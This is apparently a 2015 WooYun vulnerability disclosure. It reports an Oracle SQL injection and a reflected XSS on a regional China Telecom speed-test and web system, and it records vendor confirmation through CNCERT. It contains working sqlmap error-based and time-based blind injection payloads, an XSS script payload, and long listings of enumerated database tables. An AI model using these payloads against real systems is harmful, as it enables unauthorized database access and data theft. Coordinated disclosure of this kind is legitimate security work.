当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149099

漏洞标题:某地区电信某处存在SQL注入/可XSS弹窗(4库)

相关厂商:中国电信

漏洞作者: Hackshy

提交时间:2015-10-26 16:03

修复时间:2015-12-14 16:42

公开时间:2015-12-14 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

中国电信啊,很早就发现了,交一下吧。

详细说明:

注入地址:

http://**.**.**.**/nos/speedtest/saveuserinfo.jsp?account=

(WDXX`3E04A}U97Z}J02HKB.png

DR75MA7RH6AM3AHQ0L)574K.png

X0NRHOFF_SYN_}{6HNUQB19.png


再交一处XXS:

http://**.**.**.**/gxwap/fluxList.do?typeId=2<script>alert('wooyun')</script>

T$77A7FT]UQ_F]T2OJ]N4[H.png

漏洞证明:

跑出来的表:

Parameter: account (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: account=%00' AND 7775=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (7775=7775) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'jhMO'='jhMO
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: account=%00' AND 9590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(77)||CHR(84)||CHR(76),5) AND 'xkha'='xkha
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYS
[12 tables]
+--------------------------------+
| DUAL                           |
| AUDIT_ACTIONS                  |
| IMPDP_STATS                    |
| KU$NOEXP_TAB                   |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| PLAN_TABLE$                    |
| PSTUBTBL                       |
| STMT_AUDIT_OPTION_MAP          |
| SYSTEM_PRIVILEGE_MAP           |
| TABLE_PRIVILEGE_MAP            |
| WRI$_ADV_ASA_RECO_DATA         |
+--------------------------------+
Database: SLVIEW
[507 tables]
+--------------------------------+
| MODULE                         |
| ACCESSRAWINFO                  |
| ACCESSSTATINFO                 |
| ADDRSECTION                    |
| ADRATEMOD                      |
| ADSLSNMPDEPLOY                 |
| AGENTSERVER                    |
| AGENTSERVERTYPE                |
| ANPORTPERFSUMMON               |
| ANPORTPERFSUMWEEK              |
| APSCIRCUIT                     |
| AREADSLAMPORTCOUNT             |
| AREAINFO                       |
| AREATESTPATH                   |
| AUDITDRIVERASSIGNRULE          |
| BASDNSCOM                      |
| BASDNSCOMMAP                   |
| BASTAGMONIDAILYINFO            |
| BASTAGMONIHOURLYINFO           |
| BASTAGMONIRAWINFO              |
| BATCHWS                        |
| BBACCESSTYPE                   |
| BBUSERTYPE                     |
| BGPAS                          |
| BRASDROPRATEDAILY              |
| CABLE                          |
| CARDEXTINFO                    |
| CARDEXTINFOCFG                 |
| CARDINFO                       |
| CARDINFOCHANGE                 |
| CARDMAINTAINRECORD             |
| CFGDRIVERASSIGNRULE            |
| CFGDRIVERINSTANCE              |
| CIRCUIT                        |
| CIRCUITEXTCFG                  |
| CIRCUITTYPE                    |
| CIRENDSTYPE                    |
| CIRPROP                        |
| CIRSTATMETHOD                  |
| CIRSTATTYPE                    |
| CIRSTATTYPEDEF                 |
| CIRSTATTYPEDETAIL              |
| CIRTRANSTYPE                   |
| CIRTYPELEVELCONF               |
| CITYCODE                       |
| CITYCODEMAP                    |
| CITYDAILYJITTER                |
| CITYDAILYPERF                  |
| CITYHOURLYPERF                 |
| CITYMONTHLYPERF                |
| CITYNODECFG                    |
| CITYRAWPERF                    |
| CITYRAWPERF_TMP                |
| CN2SERVIPVPDN                  |
| CODEBOOK                       |
| COLTYPE                        |
| COMPAREFILERECORD              |
| COMPLETEDWSTONOTICE            |
| CONVERTCFG                     |
| CURRENTPARTS                   |
| CUST                           |
| CUSTEXTINFO                    |
| CUSTLEVEL                      |
| CUSTMANAGER                    |
| CUSTRESRELA                    |
| CUSTSERVEXTINFO                |
| CUSTSERVEXTINFOCFG             |
| CUSTSERVTYPE                   |
| CUSTTYPE                       |
| DATACONVERTRULE                |
| DEVADDR                        |
| DEVADDREXT                     |
| DEVBUSIACTOR                   |
| DEVCURVTYSESSNUM               |
| DEVEXTINFO                     |
| DEVEXTINFO2                    |
| DEVEXTINFOCFG                  |
| DEVEXTINFOCFG2                 |
| DEVICE                         |
| DEVICEACCOUNT                  |
| DEVICEDETAILMODEL              |
| DEVICEMODEL                    |
| DEVICEMODELLIB                 |
| DEVICEPROP                     |
| DEVICESUPPLIER                 |
| DEVICETYPE                     |
| DEVICETYPELIB                  |
| DEVICEVENDOR                   |
| DEVIOSCHANGE                   |
| DEVIPPOOL                      |
| DEVMODELMONICFG                |
| DEVONLINEOPERLOG               |
| DEVONLINEOPERTYPE              |
| DEVONLINESTATUS                |
| DEVUSEDALARMDEF                |
| DEVUSEDALARMLEVEL              |
| DHC                            |
| DHCCATINFO                     |
| DHCEXTENDCFG                   |
| DHCEXTINFO                     |
| DHCEXTINFOCFG                  |
| DHC_TAB                        |
| DISCDRIVERASSIGNRULE           |
| DISCOVEREDIPADDRESS            |
| DOCTYPE                        |
| DROPRATE                       |
| DROPRATERAW                    |
| DROPRATESUM                    |
| DSLAMAPPLYPROFILETYPE          |
| DSLAMLOSTPROFILE               |
| DSLAMPORTINSCOL                |
| DSLAMPORTINSUNQUALIF           |
| DSLAMPORTLATESTCON             |
| DSLAMPORTPARACUR               |
| DSLAMPORTPARAEXAM              |
| DSLAMPORTPARASNAPSHOT          |
| DSLAMPORTPARATHRESHOLD         |
| DSLAMPORTRATEZONE              |
| DSLAMPORTTEST                  |
| DSLAMPORTUNQUALITIME           |
| DSLAMSERVPROFILE               |
| E8PVCPARA                      |
| EMS                            |
| EMSCURVTYSESSNUM               |
| EMSSCOPE                       |
| ENGINEERINFO                   |
| ERRLOGINFO                     |
| EXCLUSIVEFUNCS                 |
| EXIDEVIPPOOL                   |
| EXIIPPOOLCONFLICT              |
| EXTCIRCUIT                     |
| EXTCIRCUITDETAIL               |
| EXTMONIITEMCOLCFG              |
| FAVORFUNC                      |
| FBINTERFACE                    |
| FBINVOKERECORD                 |
| FPCIRMATCHRULE                 |
| FUNCGROUP                      |
| FUNCGROUPCATCFG                |
| FUNCINFO2                      |
| FUNCPAGES                      |
| FUNC_ROLE                      |
| GROUPFUNCRELA                  |
| GROUPPORTINFO                  |
| GRP                            |
| GRPITEMPARAGRPSCHM             |
| GRPITEMPARAGRPSCHMDETAIL       |
| GRPTYPE                        |
| GXMAINLOGINFO                  |
| HELPDIRKBDOMAP                 |
| HOST                           |
| HOSTACCOUNT                    |
| HOSTADDR                       |
| HOSTEXTINFO                    |
| HOSTEXTINFOCFG                 |
| HOSTPROCESSSTATUS              |
| HOSTPROP                       |
| HOSTTYPE                       |
| HWCLASS                        |
| HWMODEL                        |
| HWTYPE                         |
| HWTYPEBYMODEL                  |
| IPADDRESSSEC                   |
| IPBINDRULEINFO                 |
| IPBINDRULETYPE                 |
| IPPOOLCONFLICT                 |
| IPSYN                          |
| IPV6ADDRSECT                   |
| IPV6DEVADDR                    |
| IPV6HOSTADDR                   |
| IRPT_CHECKPOLICYINFO           |
| IRPT_COMP_MUTISHEET            |
| IRPT_COMP_SHEETTEMPLET         |
| IRPT_COMP_SUBTEMPLET           |
| IRPT_COMP_TEMPLET              |
| IRPT_DATABASE                  |
| IRPT_DATAMODEL                 |
| IRPT_DATAMODEL_FULLSQL         |
| IRPT_DATAMODEL_SQL             |
| IRPT_DATAMODEL_TYPE            |
| IRPT_DAY                       |
| IRPT_FILTER_OPERATION          |
| IRPT_ITEM                      |
| IRPT_ITEM_TRAN                 |
| IRPT_PICTYPE                   |
| IRPT_SUBJECT                   |
| IRPT_SUBJECT_CALCULATE         |
| IRPT_SUBJECT_CALCULATE_ONLINE  |
| IRPT_SUBJECT_CONDEF            |
| IRPT_SUBJECT_DIM               |
| IRPT_SUBJECT_FILTER            |
| IRPT_SUBJECT_FILTERREL         |
| IRPT_SUBJECT_MEASURE           |
| IRPT_SUBJECT_MEASURE_ONLINE    |
| IRPT_SUBJECT_PIC               |
| IRPT_TEMPLET_LIMITREL          |
| IRPT_TEMPLET_LIMITREL_ONLINE   |
| IRPT_TEMPLET_LIMITVALUE        |
| IRPT_TEMPLET_LIMITVALUE_ONLINE |
| IRPT_TEMPLET_VALUE             |
| IRPT_TEMPLET_VALUE_ONLINE      |
| IRPT_WEEK                      |
| ITEMGROUP                      |
| ITEMGROUPDETAIL                |
| ITE_SG_USERRELA                |
| KBCOL                          |
| KBCOLATTACH                    |
| KBCOLDETAIL                    |
| KBDOCATTACH                    |
| KBDOCUMENT                     |
| KBDOMAIN                       |
| KBFAULTHANDLE                  |
| KBKEYWORDRECORD                |
| KBKEYWORDRELA                  |
| KBREPOSITORY                   |
| KEYPROCESSDEF                  |
| LGSRCCONFIG                    |
| LINETESTRESULT                 |
| LNSCURSTAT                     |
| LNSINFO                        |
| LNSSTATH                       |
| LNSTESTCFG                     |
| LNSTESTPDSNCFG                 |
| LPEXTINFO                      |
| LPEXTINFOCFG                   |
| LPINFO                         |
| MODULELICENSECFG               |
| MONITORPAGEDEF                 |
| MONITORPAGENUMLIMIT            |
| MRTGCFGFILE                    |
| MR_CVPORTTYPE                  |
| NET                            |
| NETSCDATACHECK                 |
| NETSCDATADELAPPLY              |
| NETSCDATADELBACKUP             |
| NETSCDATADELOBJ                |
| NETSCDIAG                      |
| NETSCDIAGREF                   |
| NETSCDIRECTION                 |
| NETSCITEM                      |
| NETSCITEMCFG                   |
| NETSCITEMCFGCONF               |
| NETSCPERFD                     |
| NETSCPERFH                     |
| NETSCRELA                      |
| NETSCRESTYPE                   |
| NETSCTDSEC                     |
| NETSCUSERTYPE                  |
| NETSCWEBSITE                   |
| NMSNODEIPBRANCHMAP             |
| NMSRESDATA                     |
| NOBUSYNETSCPERFD               |
| NODE                           |
| NODELEVEL                      |
| NODEMAPFORWH                   |
| NODERESRELA                    |
| OMITCIR                        |
| ONLINESPANSTAT                 |
| ONLINEUSER                     |
| OPERLOGINFO                    |
| OPERLOGMODULE                  |
| OPERTYPE                       |
| OPERTYPEMAP                    |
| PAGEGUIDECONF                  |
| PAGELOGINFO                    |
| PAGEMODULE                     |
| PARTITIONCLEANCFG              |
| PARTITIONERRORLOG              |
| PARTITIONOPERLOG               |
| PARTSHISTORY                   |
| PERFPARACFG                    |
| PMHOST                         |
| PMSTATUS                       |
| POLGRPPINGCONF                 |
| POLICYGROUPINFO                |
| PONCFG                         |
| PORTBANDWIDTHCLASS             |
| PORTINFO                       |
| PORTINFOCHANGE                 |
| PORTRATECFG                    |
| PORTRATEDAILY                  |
| PORTRATEDETAILMON              |
| PORTRATEMONTH                  |
| PORTRATERAW                    |
| PORTRATESUM                    |
| PORTSPEEDSTAT                  |
| PORTVLANRELA                   |
| PPEXTINFO                      |
| PPEXTINFOCFG                   |
| PPINFO                         |
| PROBEAGENTCFG                  |
| PROBEHOST                      |
| PROBEIP                        |
| PROBERES                       |
| PROBERESTRICTIONS              |
| PROVIDER                       |
| PROVIDERQOSLEVELMAPPING        |
| PROVIDERQOSMODE                |
| PROVIDERTYPE                   |
| PROVINCEINFO                   |
| QOSCLASS                       |
| QOSCLASSMAP                    |
| QOSPOL                         |
| QOSPOLDEPLOY                   |
| QOSPOLTYPE                     |
| QOSPOLTYPECHAR                 |
| QOSPORTANALYZE                 |
| QOSPORTANCLASS                 |
| QOSQUEUE                       |
| QUERYPAGEDISPCONF              |
| REPORTRESMATCHRULE             |
| REPORTTEMPTABLE                |
| RES                            |
| RESCFGCOLITEM                  |
| RESCLASS                       |
| RESCOLITEMPROFILE              |
| RESCOLPROGCFG                  |
| RESCOLTIMEPLAN                 |
| RESCOLTIMEPLANDETAIL           |
| RESCURINFO                     |
| RESGROUP                       |
| RESMONICURINFO                 |
| RESMONIDAILYINFO               |
| RESMONIDERIVEDITEMCFG          |
| RESMONIHOURLYINFO              |
| RESMONIITEMCFG                 |
| RESMONIITEMCOLCFG              |
| RESMONIITEMLIB                 |
| RESMONIMONTHLYINFO             |
| RESMONIRAWINFO                 |
| RESMONITHRESHOLD               |
| RESPARATAG                     |
| RESPARATAGFULL                 |
| RESRELATION                    |
| RESSTATCURINFO                 |
| RESSTATHISINFO                 |
| RESSTATITEMCFG                 |
| RESSTATTIME                    |
| RESSTATTIMERELA                |
| RESSUMBP                       |
| RESSUMGROUP                    |
| RESTAG                         |
| RESTAGFULL                     |
| RESTYPE                        |
| RESUPDATE                      |
| RESVALIDHIS                    |
| RESVENDOR                      |
| RIGHTMENU2GROUPINFO            |
| RIGHTMENUINFO                  |
| RIGHTMENUPAGERELA              |
| RIGHTMENU_ROLE                 |
| ROLEGROUPRELA                  |
| ROLEINFO                       |
| ROLEKBAUTH                     |
| ROLERPTTEMPLETRELA             |
| ROUNDEDIFSPEEDDEF              |
| RPTBASRES                      |
| RPTHIS                         |
| RPTPAGEDEF                     |
| RPTPAGEVAL                     |
| RPTSUBSCRIPTION                |
| RPTTEMPLET                     |
| RPTTEMPLETTYPE                 |
| RPTTEMPLETTYPELIB              |
| RPTTEMPLET_ONLINE              |
| RPTTREE                        |
| RP_DISPTHRESHOLD               |
| SAVERESULT                     |
| SERV                           |
| SERVADSL                       |
| SERVAUDITTASKDETAIL            |
| SERVCFGPARA                    |
| SERVCFGTASKDETAIL              |
| SERVCFGTASKEXTRATMP            |
| SERVCFGTASKPARA                |
| SERVCFGTEMPLET                 |
| SERVCFGTMPDETAIL               |
| SERVCHANGE                     |
| SERVCLASS                      |
| SERVCUSTIP                     |
| SERVDISCTASKDETAIL             |
| SERVMODEL                      |
| SERVRPTHIS                     |
| SERVRPTSUBSCRIPTION            |
| SERVRPTTYPE                    |
| SERVTASKDISASSEMBLECUSTOMIZE   |
| SERVTASKLOGDETAILOLD           |
| SERVTASKLOGOLD                 |
| SERVTASKMANOBJECT              |
| SERVTASKOLD                    |
| SERVTASKSCHEDULEOLD            |
| SERVTYPE                       |
| SERVTYPEMAP                    |
| SGSYSTEM                       |
| SGSYSTEMOTHERFIELDINFO         |
| SGSYSTEMUSERINFO               |
| SINGLEUSERNODEAUTH             |
| SINGLEUSERRESAUTH              |
| SLOTEXTINFO                    |
| SLOTEXTINFOCFG                 |
| SLOTINFO                       |
| SLOTINFOCHANGE                 |
| SLRELACIR                      |
| SLSERV                         |
| SLSERVHIS                      |
| SPEEDDEFFORPORTTYPECONV        |
| SPEEDMAP                       |
| SPEEDRANGEDEF                  |
| SPEEDSVRIPRANGE                |
| SPEEDSVRIPRANGE0408            |
| SPEEDSVRIPRANGE150319          |
| SPEEDSVRIPRANGE20130410        |
| SPEEDSVRIPRANGE20131107        |
| SPEEDSVRIPRANGE20150129        |
| SPEEDSVRIPRANGE20150316        |
| SPEEDSVRIPRANGEBAK20121111     |
| SPEEDSVRIPRANGEBAK20130115     |
| SPEEDSVRIPRANGEBAK20130316     |
| SPEEDSVRIPRANGEBAK20140425     |
| SPEEDSVRIPRANGEBAKOLD          |
| SPEEDTESTFTP                   |
| SPEEDTESTFTP20130426           |
| SPEEDTESTFTPBAK20130501        |
| SPEEDTESTFTPGJ                 |
| SPEEDTESTFTPTMP                |
| SPEEDTESTFTPTMP                |
| SPEEDTESTHTTP                  |
| SPEEDTESTHTTPGJ                |
| SPEEDTESTHTTPTMP               |
| SPEEDTESTPING                  |
| SPEEDTESTPINGGJ                |
| SPEEDTESTSVR                   |
| SPEEDTESTSVRNODE               |
| SPEEDTESTUSER                  |
| SPEEDTESTUSERTMP               |
| SPEEDTESTUSRCLASSCFG           |
| SPEEDTESTVIDEO                 |
| SPEEDTESTVIDEOGJ               |
| SPEEDTESTWEBSITE               |
| STATGROUPDETAIL                |
| STATGROUPINFO                  |
| STATSHOWCONTENT                |
| STATSHOWCONTENTD               |
| STATSHOWCONTENTRAW             |
| STATSHOWCUSTERMIZE             |
| STATTIMESCHEME                 |
| STATTIMESCHEMEDETAIL           |
| SUMANAGRP                      |
| SUMANAGRPDETAIL                |
| SYSENTRYLOG                    |
| SYSPARA                        |
| TAG                            |
| TAGEXTDEF                      |
| TAGEXTRES                      |
| TAGTEMPLET                     |
| TAGTREE                        |
| TAGTREECFG                     |
| TAGTREECHANGELOG               |
| TAGTREENODECODE_RES            |
| TAGTREENODERESDEF              |
| TAGTYPE                        |
| TEMPLETPARA                    |
| TESTRESULTDEFINE               |
| TESTRESULTRULE                 |
| TESTRESULTRULEITEM             |
| TESTTYPE                       |
| TIMESLOTDEFINE                 |
| TIMESLOTSTAT                   |
| TIMESPANDEFINE                 |
| TOPSPSTAT                      |
| TRUNKLINE                      |
| UDFSERVCFGTEMPLET              |
| UICUSTERMIZE                   |
| UNQUALIPORTSTAT                |
| USERADDRACL                    |
| USERAUTHMODREC                 |
| USERAUTHUPDATE                 |
| USERCUSTMGRRELA                |
| USERINFO                       |
| USERKBAUTH                     |
| USERMAINPAGECFG                |
| USERNODEUPDATE                 |
| USERORGANIZE                   |
| USERRESAUTH                    |
| USERRESUPDATE                  |
| USERSTATGRPVIEWAUTH            |
| USERTAGTREEAUTH                |
| USERTEMPLETCFGAUTH             |
| USERTEMPLETUSEAUTH             |
| USER_ROLE                      |
| VIDEOTESTFILE                  |
| VIDEOTESTFILETYPE              |
| VLAN                           |
| VLANPORT                       |
| VLANPORTRELA                   |
| VPNBGPTEMPMODOPERLOG           |
| VPNQOSPOLICY                   |
| VPNQOSUDFMATCHRULE             |
| VRRPGROUP                      |
| WEBSERVICELOG                  |
| WORKSHEETEXTCFG                |
| WORKSHEETEXTDISPCFG            |
| WORKSHEETRELA                  |
| WREDPARACFG                    |
| WSEXTRATMP                     |
| WSEXTRATMPPARA                 |
| XMLRAWINFO                     |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS        |
| CWM2$AWDIMCREATEACCESS         |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS   |
| CWM2$_AW_TEMP_CUST_MEAS_MAP    |
| CWM2$_TEMP_VALUES              |
| OLAP_SESSION_CUBES             |
| OLAP_SESSION_DIMS              |
| XML_LOAD_LOG                   |
| XML_LOAD_RECORDS               |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| DEF$_TEMP$LOB                  |
| MVIEW$_ADV_INDEX               |
| MVIEW$_ADV_OWB                 |
| MVIEW$_ADV_PARTITION           |
| OL$                            |
| OL$HINTS                       |
| OL$NODES                       |
+--------------------------------+


不深入了。

修复方案:

过滤

版权声明:转载请注明来源 Hackshy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 16:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无